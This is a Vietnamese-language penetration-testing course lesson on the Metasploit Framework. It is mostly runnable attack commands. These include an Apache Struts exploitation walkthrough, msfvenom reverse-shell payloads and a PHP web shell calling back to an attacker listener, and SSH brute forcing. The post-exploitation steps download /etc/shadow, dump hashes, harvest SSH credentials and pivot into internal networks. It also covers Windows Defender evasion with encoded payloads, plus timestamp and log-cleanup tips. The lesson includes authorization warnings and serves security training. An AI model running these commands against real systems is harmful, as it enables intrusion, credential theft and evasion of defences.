Chuyển đến nội dung chính

Bài 16: Exploitation Frameworks — Metasploit

Metasploit Framework architecture, modules, msfconsole, payload generation, post-exploitation, evasion techniques.

🔒 DevSecOps — Bài 16 Bài 16: Exploitation Frameworks — Metasploit

Performance Testing & Pentest: Quy trình Chuẩn Doanh nghiệp 2026

Phần 4: Pentest Nâng cao — Cloud, Container & AI

xdev.asia

1. Metasploit Framework — Kiến trúc

Metasploit Architecture:

┌─────────────────────────────────────────────┐
│              Metasploit Framework            │
├─────────────────────────────────────────────┤
│  Interfaces:                                │
│  ├── msfconsole (primary CLI)               │
│  ├── msfweb (deprecated)                    │
│  └── REST API (for automation)              │
├─────────────────────────────────────────────┤
│  Modules:                                   │
│  ├── Exploits     (~2500+ public exploits)  │
│  ├── Payloads     (singles, stagers, stages)│
│  ├── Auxiliary     (scanners, fuzzers)      │
│  ├── Post          (post-exploitation)      │
│  ├── Encoders      (payload encoding)       │
│  └── Evasion       (AV bypass)              │
├─────────────────────────────────────────────┤
│  Libraries:                                 │
│  ├── Rex (sockets, protocols, encoders)     │
│  ├── Msf::Core (framework core)            │
│  └── Msf::Base (simplified API)            │
├─────────────────────────────────────────────┤
│  Database: PostgreSQL (hosts, services, vulns)│
└─────────────────────────────────────────────┘

Editions:
  Framework (Free/Open Source):
    └── Full module library, msfconsole

  Pro (Commercial):
    ├── Web UI, reporting
    ├── Automated exploitation
    └── Social engineering campaigns

2. msfconsole — Sử dụng cơ bản

# Start Metasploit
msfconsole

# --- Database setup ---
msfdb init
db_status

# --- Module search ---
msf6 > search type:exploit platform:linux apache
msf6 > search cve:2024
msf6 > search name:tomcat type:exploit

# --- Module information ---
msf6 > info exploit/multi/http/apache_log4j_rce
msf6 > show options
msf6 > show payloads
msf6 > show targets

# --- Workspace management ---
msf6 > workspace -a pentest_example_com
msf6 > workspace pentest_example_com
msf6 > workspace -l

3. Exploitation Workflow

# Step 1: Reconnaissance with Metasploit
msf6 > db_nmap -sV -sC -O -p- 10.0.0.1
msf6 > hosts
msf6 > services
msf6 > vulns

# Step 2: Select exploit
msf6 > use exploit/multi/http/apache_struts2_content_type_ognl

# Step 3: Configure options
msf6 exploit(apache_struts2...) > set RHOSTS 10.0.0.1
msf6 exploit(apache_struts2...) > set RPORT 8080
msf6 exploit(apache_struts2...) > set TARGETURI /struts2-showcase/
msf6 exploit(apache_struts2...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(apache_struts2...) > set LHOST 10.0.0.100
msf6 exploit(apache_struts2...) > set LPORT 4444

# Step 4: Verify settings
msf6 exploit(apache_struts2...) > show options
msf6 exploit(apache_struts2...) > check   # Non-intrusive check if vulnerable

# Step 5: Execute
msf6 exploit(apache_struts2...) > exploit
# or: run

# Step 6: Post-exploitation (Meterpreter session)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ifconfig
meterpreter > ps
meterpreter > hashdump

4. Payloads

Payload Types:
  Singles:   Self-contained (e.g., exec command)
  Stagers:   Small payload that downloads stage
  Stages:    Larger payload downloaded by stager

  Naming: platform/arch/type/connection
  Example: linux/x64/meterpreter/reverse_tcp
           └─os──┘└arch┘└──type───┘└─connection─┘

Connection Types:
  reverse_tcp    : Target connects back to attacker
  bind_tcp       : Attacker connects to target  
  reverse_http   : Reverse via HTTP (bypass firewall)
  reverse_https  : Reverse via HTTPS (encrypted)
# --- msfvenom — Payload Generator ---

# Linux reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=10.0.0.100 LPORT=4444 \
  -f elf -o payload.elf

# Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.0.0.100 LPORT=4444 \
  -f exe -o payload.exe

# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp \
  LHOST=10.0.0.100 LPORT=4444 \
  -f raw -o payload.py

# Web shell (PHP)
msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=10.0.0.100 LPORT=4444 \
  -f raw -o shell.php

# --- Listener setup ---
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.0.100
msf6 > set LPORT 4444
msf6 > exploit -j   # Run as background job

5. Auxiliary Modules

# --- Scanning ---
# SSH version scanner
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 > set RHOSTS 10.0.0.0/24
msf6 > set THREADS 50
msf6 > run

# HTTP directory scanner
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 > set RHOSTS 10.0.0.1
msf6 > set DICTIONARY /usr/share/wordlists/dirb/common.txt
msf6 > run

# SMB share enumeration
msf6 > use auxiliary/scanner/smb/smb_enumshares
msf6 > set RHOSTS 10.0.0.0/24
msf6 > run

# --- Credential testing ---
# SSH brute force
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 > set RHOSTS 10.0.0.1
msf6 > set USERNAME root
msf6 > set PASS_FILE /usr/share/wordlists/rockyou-top1000.txt
msf6 > set STOP_ON_SUCCESS true
msf6 > run

# --- Fuzzing ---
msf6 > use auxiliary/fuzzers/http/http_form_field
msf6 > set RHOSTS 10.0.0.1
msf6 > set RPORT 8080
msf6 > run

6. Post-Exploitation

# --- Meterpreter Post-Exploitation ---

# System info
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid

# Network info
meterpreter > ifconfig
meterpreter > route
meterpreter > arp
meterpreter > netstat

# File system
meterpreter > pwd
meterpreter > ls
meterpreter > download /etc/shadow
meterpreter > upload local_file.sh /tmp/

# Process management
meterpreter > ps
meterpreter > migrate 1234   # Migrate to another process

# Credential harvesting
meterpreter > hashdump
meterpreter > run post/linux/gather/hashdump
meterpreter > run post/multi/gather/ssh_creds

# Privilege escalation
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > getsystem   # Windows only

# Pivoting — access internal networks
meterpreter > run autoroute -s 192.168.1.0/24
meterpreter > run autoroute -p   # Print routes
# Now msf can reach 192.168.1.x through the compromised host

# Port forwarding
meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.10
# Access internal RDP via localhost:3389

# Session management
meterpreter > background
msf6 > sessions -l          # List sessions
msf6 > sessions -i 1        # Interact with session 1

7. Evasion Techniques

# --- Payload encoding ---
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.0.0.100 LPORT=443 \
  -e x64/xor_dynamic \
  -i 5 \
  -f exe -o encoded_payload.exe

# --- Evasion modules ---
msf6 > use evasion/windows/windows_defender_exe
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.0.100
msf6 > generate -f /tmp/evasion.exe

# --- Sleep/delay techniques ---
# Payload sleeps before executing to evade sandbox analysis
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.0.0.100 LPORT=443 \
  PrependMigrate=true \
  -f exe -o delayed.exe
Evasion Best Practices (for pentest purposes):
  ├── Test in isolated lab first
  ├── Use encrypted channels (HTTPS, DNS)
  ├── Avoid touching disk when possible
  ├── Living-off-the-land (LOLBins)
  ├── Timestamp modification
  ├── Log cleanup (only with authorization!)
  └── Document all evasion techniques used

⚠️ IMPORTANT:
  - Only use in authorized pentest engagements
  - Document every action for the report
  - Never use against production without explicit approval
  - Clean up all artifacts after testing

8. Automation với Resource Scripts

# auto_scan.rc — Metasploit resource script
# Usage: msfconsole -r auto_scan.rc

# Setup workspace
workspace -a auto_pentest
setg RHOSTS 10.0.0.0/24

# Phase 1: Discovery
use auxiliary/scanner/portscan/tcp
set PORTS 21,22,23,25,80,110,139,443,445,3306,3389,5432,8080
set THREADS 50
run

# Phase 2: Service enumeration
use auxiliary/scanner/ssh/ssh_version
run

use auxiliary/scanner/http/http_version
set PORTS 80,443,8080
run

use auxiliary/scanner/smb/smb_version
run

# Phase 3: Vulnerability check
use auxiliary/scanner/smb/smb_ms17_010
run

# Export results
hosts -o /tmp/hosts.csv
services -o /tmp/services.csv
vulns -o /tmp/vulns.csv

9. Tổng kết

  • Metasploit: Framework exploitation hàng đầu — exploits, payloads, post-exploitation
  • msfconsole: Interface chính — search, use, set, exploit
  • Payloads: Meterpreter (full-featured), reverse/bind, staged/stageless
  • Post-exploitation: Pivoting, credential harvesting, lateral movement
  • Evasion: Encoding, evasion modules, encrypted channels
  • Automation: Resource scripts, REST API integration

Bài tiếp theo sẽ khám phá Cloud Pentesting — AWS, Azure, GCP.